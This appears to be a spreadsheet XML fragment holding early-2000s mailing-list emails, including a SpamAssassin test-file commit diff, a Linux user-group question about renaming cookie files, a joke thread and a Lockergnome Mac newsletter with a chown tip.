 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
 BQFAUBQFAUBQFAUBQf/Z
 ------=_BkymKzPF_EOQL8qx8_MR--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</si>
  <si>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
     Anthony&gt; They weren't partitioned in any particular scheme - I think
     Anthony&gt; I'll write a reshuffler and move them all around, ...
 Hmmm.   How about you create empty Data/Ham/Set[12345], stuff all your
 files into a Data/Ham/reservoir folder, then run the rebal.py script to
 randomly parcel messages out to the various real directories?
 I suspect you can pull the same stunt for your Data/Spam stuff.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] [OT] Renaming Cookies
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 Does anyone know if it is possible to just rename the cookie files, as in
 user1@site.com -&gt; user2@site.com?
 If so, what's the easiest way to do this.
 The cookies are on a windows box, but I can smbmount the hard disk if this
 is the best way to do it.
 Thanks,
 	David.
 David Hamilton
 Senior Technical Consultant
 HP Ireland 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/t db_based_whitelist.t,1.6.4.1,1.6.4.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/t
 In directory usw-pr-cvs1:/tmp/cvs-serv4019/t
 Modified Files:
       Tag: b2_4_0
 	db_based_whitelist.t db_based_whitelist_ips.t 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: db_based_whitelist.t
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v
 retrieving revision 1.6.4.1
 retrieving revision 1.6.4.2
 diff -b -w -u -d -r1.6.4.1 -r1.6.4.2
 --- db_based_whitelist.t	24 Sep 2002 18:51:38 -0000	1.6.4.1
 +++ db_based_whitelist.t	2 Oct 2002 13:19:28 -0000	1.6.4.2
 @@ -2,7 +2,7 @@
  use lib '.'; use lib 't';
  use SATest; sa_t_init("db_based_whitelist");
 -use Test; BEGIN { plan tests =&gt; 3 };
 +use Test; BEGIN { plan tests =&gt; 8 };
  # ---------------------------------------------------------------------------
 @@ -16,17 +16,17 @@
  %patterns = %is_nonspam_patterns;
  $scr_test_args = "-M Mail::SpamAssassin::DBBasedAddrList";
 -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb);
 +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));
  # 3 times, to get into the whitelist:
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  # Now check
  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  ok_all_patterns();
  %patterns = %is_spam_patterns;
 -sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb));
  ok_all_patterns();
 Index: db_based_whitelist_ips.t
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v
 retrieving revision 1.1.2.1
 retrieving revision 1.1.2.2
 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
 --- db_based_whitelist_ips.t	24 Sep 2002 18:51:38 -0000	1.1.2.1
 +++ db_based_whitelist_ips.t	2 Oct 2002 13:19:29 -0000	1.1.2.2
 @@ -2,7 +2,7 @@
  use lib '.'; use lib 't';
  use SATest; sa_t_init("db_based_whitelist_ips");
 -use Test; BEGIN { plan tests =&gt; 3 };
 +use Test; BEGIN { plan tests =&gt; 8 };
  # ---------------------------------------------------------------------------
 @@ -15,18 +15,18 @@
  %patterns = %is_nonspam_patterns;
 -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb);
 +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));
  # 3 times, to get into the whitelist:
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  # Now check
  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  ok_all_patterns();
  %patterns = %is_spam_patterns;
 -sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));
  ok_all_patterns();
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">less obscure haiku 
 buy a puppy, ro!
 they are chick magnets. master
 ventriloquism.
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 18, 2002 7:13 PM
 To: R. A. Hettinga
 Cc: fork@example.com
 Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
 On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 And, as always, you can take a page out of Fight Club and start showing up
 at all sorts of support groups. Look what it did for Marla and Jack...
 "JACK You can't have *both* parasites. You take blood parasites and --
 MARLA I want brain parasites.
 She opens another dryer and does the same thing again. PG 19
 JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 and --
 MARLA I want that.
 JACK You can't have the whole brain!
 MARLA So far, you have four and I have two!
 JACK Well, then, take blood  parasites. Now, we each have three.
 MARLA So, we each have three -- that's six. What  about the seventh day? I
 want ascending bowel cancer.
 JACK *I* want ascending bowel cancer.
 MARLA That's your favorite, too? Tried to slip it by me, huh?
 JACK We'll split it. You get it the first and third Sunday of the month.
 MARLA Deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Apple Core]  Skip Content
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/applecore/20020709.html"&gt;
       http://www.lockergnome.com/issues/applecore/20020709.html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#14367A }
  a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020709 Lockergnome Apple Core&lt;/title&gt;&lt;/head&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 10pt" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.09.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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I've finally done it! Lockrgnome's Top 50 
 &lt;a href="http://www.gnometomes.com/tome/cat_macintosh.html"&gt;Mac OS X Tips&lt;/a&gt; is in publication 
 and available for purchase at GnomeTomes.com. Less than half the tips have 
 appeared in the Apple Core newsletter already, so purchasing them means 
 getting mostly brand new content. This represents the first thing I've 
 written that people might actually pay to read, so if we sell one copy, 
 I'll be ecstatic. And hopefully, any of you who check out the tips will 
 find them useful. I know that figuring out how to do each of the 50 things 
 on the list has improved my personal OS X experience.
 &lt;p&gt;
 Although this newsletter started out with Chris, Randy, and I writing 
 sections of the newsletter, time constraints have limited the 
 contributions of the other two guys. This does not mean either of them is 
 truly less involved, it just means I'm doing more writing. Both Chris and 
 Randy regularly send me links to cool Mac stuff they find, much of which 
 will ultimately end up in upcoming issues. Since the writing will be 
 primarily mine, I've opted to eliminate the "Review by" links at the bottom 
 of each article. Unless otherwise noted, you can safely assume I wrote it. 
 If you need to send me an e-mail, the E-mail The Editors Link in the 
 sidebar will reach me, as well as putting your message in front of Chris 
 and Randy.
 &lt;p&gt;
 I've been doing some exploring of AppleScript over the past several months 
 and believe I'm finally confidant enough in writing scripts that I'm going 
 to add a section on scripting to the newsletter. I'm curious to know what 
 your level of experience with scripting is, because I can either start with 
 some really basic stuff, or skip the basics and dive into meatier scripting 
 topics. Either way, I'm open to some 
 &lt;a href="mailto:jake@lockergnome.com?subject=AppleScript"&gt;AppleScript suggestions&lt;/a&gt;.
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Jake Ludington, Script" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;p class="url"&gt;For Mac Outlook users:&lt;br&gt;
 OS X Tips - http://www.gnometomes.com/tome/cat_macintosh.html&lt;/p&gt;
 &lt;!-- DOWNLOADS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Sherlock Plugins v2.2 [600k] Mac OS 9/OSX FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.searchstandard.com/"&gt;http://www.searchstandard.com/&lt;/a&gt;&lt;p&gt;
 While doing some research for my top 50 tips, I discovered that turning 
 off some of Sherlock's extras, like multi-language indexing, in the 
 preferences will speed things up considerably, particularly for local 
 machine searches. This renewed my interest in finding ways to add-on 
 search capabilities to the bundled sleuth, resulting in my discovery of 
 SearchStandard.com. This bundled collection of search plug-ins makes it 
 possible to look for almost anything using Sherlock. Their Web site 
 won't wow you, but SearchStandard's free plugins most certainly make 
 finding things online, including searches on your favorite Mac sites, 
 that much easier.
 &lt;!-- GnomeNETWORK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeNETWORK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Xnet v1.0.6 [216k] OSX $48&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://bitcom.ch/products-xnet-e.html"&gt;http://bitcom.ch/products-xnet-e.html&lt;/a&gt;&lt;p&gt;
 Dealing with servers that offer mission critical services, like 
 intranet access, e-mail, or Web serving, means dealing with those 
 services failing from time to time. Don't be left in the dark 
 when one of your services go down, let Xnet keep you informed. 
 The unregistered version of the product lets you verify http, 
 ping, smtp, and ftp service availability, with many more service 
 verifications included in the pro version. Xnet runs on your 
 local machine, verifying remote service availability and sending 
 you a message when those services go down. The interface allows 
 for user-defined services, with alert features for both an e-mail 
 account (mine alerts are going to my cell phone) and locally via 
 a sound from your machine.
 &lt;!--  GnomeTERMINAL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTERMINAL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 For OS X installs with multiple users, there may come a time when you 
 need to change ownership of a particular file. This is particularly 
 useful in situations where one user created a file, but an entirely 
 different user is the only one who will ever make future decisions 
 relating to that file, like whether to keep it or throw it in the 
 Trash. chown is the Terminal command designed to handle this. From 
 the command line type:
 &lt;p&gt;
 sudo chown username filename
 &lt;p&gt;
 You'll of course want to substitute the username of the new owner for 
 username. The name of the file receiving a change of ownership will 
 replace filename.
